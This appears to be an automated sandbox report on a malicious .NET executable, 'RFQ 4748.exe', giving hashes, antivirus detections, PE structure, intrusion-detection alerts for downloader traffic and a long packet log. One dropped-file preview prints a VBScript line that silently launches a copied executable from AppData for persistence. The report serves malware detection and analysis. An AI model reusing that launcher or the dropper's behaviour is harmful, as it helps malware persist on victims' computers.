                                                            Size (bytes):97280
                                                            Entropy (8bit):6.175068802964245
                                                            Encrypted:false
                                                            SSDEEP:1536:lweD62hOc0LT1v7dmsRKEn+s0MP3p/dnfkNH+zORM2k6dRQcWmyzdBdreJAXb4+i:lweD62hOc0LldmgN0MPXoMl63VypeJWI
                                                            MD5:AD61C5C16181FE8CE8FE58AB4BF3D15D
                                                            SHA1:656CCB4712CB709B217DA2341E3F6069CAEBF0FB
                                                            SHA-256:E7C828D9806CFAAA5251E8DFD14B76835A2E8F661AD392DE85C6A93059202F40
                                                            SHA-512:1C5C1F58177DAF6744B85CFABC8D5C55B6669BEE5ACB1E3D64F83695A044A617F6B9D3BF0A21824E3D8EF09EE397DD77CFB01F3066A709C6CA8300DC00167BA3
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                            Reputation:low
                                                            Process:C:\Users\user\Desktop\RFQ 4748.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            Process:C:\Users\user\Desktop\RFQ 4748.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):84
                                                            Entropy (8bit):4.784560579080416
                                                            Encrypted:false
                                                            SSDEEP:3:FER/n0eFHHoUkh4EaKC54E1NHn:FER/lFHI9aZ54EX
                                                            MD5:6AFC3818583050D45EA3A71E01E9701C
                                                            SHA1:DEFFFC2B97FBF281FB4C716CC0D749E0DB75B20B
                                                            SHA-256:7CACC823FD16E2BFD3893DEC94E74A54C13CFDB63606D217863742D38421C531
                                                            SHA-512:5B207EBF88070167A3F07BF806A1874E11EAEB713CE8A9709AE672F7C03CB246B5D7D10AE56D12F6BD42EBD70D505EAEC0AE5B745BAB2656FA7FBC550B0D8A0A
                                                            Malicious:true
                                                            Reputation:low
                                                            Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Fallback.exe"""
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):6.175068802964245
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:RFQ 4748.exe
                                                            File size:97'280 bytes
                                                            MD5:ad61c5c16181fe8ce8fe58ab4bf3d15d
                                                            SHA1:656ccb4712cb709b217da2341e3f6069caebf0fb
                                                            SHA256:e7c828d9806cfaaa5251e8dfd14b76835a2e8f661ad392de85c6a93059202f40
                                                            SHA512:1c5c1f58177daf6744b85cfabc8d5c55b6669bee5acb1e3d64f83695a044a617f6b9d3bf0a21824e3d8ef09ee397dd77cfb01f3066a709c6ca8300dc00167ba3
                                                            SSDEEP:1536:lweD62hOc0LT1v7dmsRKEn+s0MP3p/dnfkNH+zORM2k6dRQcWmyzdBdreJAXb4+i:lweD62hOc0LldmgN0MPXoMl63VypeJWI
                                                            TLSH:8A935C7C638CAE63CE6C257CE07281464770D2A7C203E7BB7998EDE8258175F151A39B
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x41918e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x672D9EBD [Fri Nov 8 05:16:45 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19138 | 0x53 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0x600 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1c000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x17194 | 0x17200 | c185b9d4274a08ad41fccb1ab1ba2757 | False | 0.5001266891891892 | data | 6.226141360222747 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x1a000 | 0x600 | 0x600 | d6c6d0e4f55e60d30e14a97604445e81 | False | 0.41796875 | data | 4.108824423085661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x1c000 | 0xc | 0x200 | 024d957f67d860d7086c42778b56eb22 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x1a0a0 | 0x32c | data | | | 0.4211822660098522 |
| RT_MANIFEST | 0x1a3cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-08T11:51:18.089032+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49705 | 193.122.6.168 | 80 | TCP |
| 2024-11-08T11:51:19.401563+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49705 | 193.122.6.168 | 80 | TCP |
| 2024-11-08T11:51:20.144257+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP |
| 2024-11-08T11:51:21.339167+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49708 | 193.122.6.168 | 80 | TCP |
| 2024-11-08T11:51:25.754181+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49713 | 188.114.96.3 | 443 | TCP |
| 2024-11-08T11:51:29.956391+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49721 | 188.114.96.3 | 443 | TCP |
| 2024-11-08T11:51:30.265429+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.5 | 49716 | TCP |
| 2024-11-08T11:51:37.385956+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49758 | 193.122.6.168 | 80 | TCP |
| 2024-11-08T11:51:38.479711+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49758 | 193.122.6.168 | 80 | TCP |
| 2024-11-08T11:51:39.173813+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49771 | 188.114.96.3 | 443 | TCP |
| 2024-11-08T11:51:40.089181+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49776 | 193.122.6.168 | 80 | TCP |
| 2024-11-08T11:51:40.805290+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49782 | 188.114.96.3 | 443 | TCP |
| 2024-11-08T11:51:44.079836+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49802 | 188.114.96.3 | 443 | TCP |
| 2024-11-08T11:52:08.779079+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.5 | 49938 | TCP |

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 8, 2024 11:51:13.493808031 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.528754950 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.528857946 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.540910006 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.541008949 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.610577106 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.610730886 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.646446943 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.646517992 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.658263922 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.658330917 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.700126886 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.700196981 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.727951050 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.728033066 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.775599957 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.775695086 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.775974989 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.776038885 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.845968008 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.846050978 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.880929947 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.881055117 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.893053055 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.893269062 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.962892056 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.962996960 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:13.963582993 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:13.963654995 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.009987116 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.010126114 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.010493040 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.010698080 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.080703974 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.080930948 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.081583023 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.081666946 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.127222061 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.127464056 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.169061899 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.169154882 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.198348999 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.198607922 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.198884010 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.198955059 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.244913101 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.245167971 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.286391973 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.286483049 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.315047979 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.315323114 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.315697908 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.315911055 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.361783028 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.361867905 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.403908014 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.403991938 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.432671070 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.432769060 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.432986975 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.433058023 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.468281031 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.468497038 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.479927063 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.480130911 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.549499035 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.549721956 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.549936056 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.550018072 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.550993919 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.551076889 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.597572088 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.597676039 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.597800970 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.597862005 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.667665005 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.667880058 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.668632030 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.668670893 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.668704987 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.668723106 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.668740988 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.668762922 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.716425896 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.716510057 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.720458984 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.720529079 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.788418055 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.788688898 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.788809061 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.788871050 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.788873911 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.788882971 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.788938046 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.832339048 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.832477093 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.832556963 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.832654953 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.903129101 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.903256893 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.905627012 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.905713081 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.906296968 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.906362057 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.949161053 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.949255943 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.949707985 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.949774981 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:14.951854944 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:14.951929092 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.020390034 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.020479918 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.023121119 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.023186922 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.023581982 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.023657084 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.066466093 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.066551924 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.067169905 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.067241907 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.107014894 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.107104063 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.137558937 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.137693882 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.140537977 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.140629053 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.141063929 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.141123056 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.183871031 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.183953047 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.184441090 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.184504032 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.224190950 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.224318981 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.254925966 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.255048990 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.257653952 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.257738113 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.258410931 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.258486986 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.303762913 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.303826094 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.303863049 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.303894997 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.303911924 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.303940058 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.304389954 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.304466009 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.371993065 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.372128010 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.374955893 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.375056982 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.375762939 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.375861883 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.376200914 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.376274109 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.420805931 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.420964003 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.421093941 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.421169043 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.461302042 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.461525917 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.489516020 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.489636898 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.492398977 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.492476940 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.493190050 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.493266106 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.522460938 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.522557020 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.538007975 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.538103104 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.538431883 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.538497925 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.606496096 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.606580019 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.606936932 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.607009888 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.610146999 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.610215902 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.611555099 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.611619949 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.639967918 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.640197039 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.655340910 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.655426979 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.655446053 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.655462980 CET44349704185.78.221.73192.168.2.5
                                                            Nov 8, 2024 11:51:15.655519962 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:15.659826994 CET49704443192.168.2.5185.78.221.73
                                                            Nov 8, 2024 11:51:16.914963961 CET4970580192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:16.919931889 CET8049705193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:16.920000076 CET4970580192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:16.920197964 CET4970580192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:16.925060034 CET8049705193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:17.763024092 CET8049705193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:17.800525904 CET4970580192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:17.805428028 CET8049705193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:18.049206972 CET8049705193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:18.089031935 CET4970580192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:18.106323957 CET49706443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:18.106370926 CET44349706188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:18.106465101 CET49706443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:18.113980055 CET49706443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:18.114001989 CET44349706188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:18.726279974 CET44349706188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:18.726526022 CET49706443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:18.731707096 CET49706443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:18.731712103 CET44349706188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:18.732175112 CET44349706188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:18.776767015 CET49706443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:18.781400919 CET49706443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:18.827333927 CET44349706188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:19.091113091 CET44349706188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:19.091193914 CET44349706188.114.96.3192.168.2.5
                                                            Nov 8, 2024 11:51:19.091377974 CET49706443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:19.096950054 CET49706443192.168.2.5188.114.96.3
                                                            Nov 8, 2024 11:51:19.100511074 CET4970580192.168.2.5193.122.6.168
                                                            Nov 8, 2024 11:51:19.106549978 CET8049705193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:19.350430965 CET8049705193.122.6.168192.168.2.5
                                                            Nov 8, 2024 11:51:19.352611065 CET49707443192.168.2.5188.114.96.3
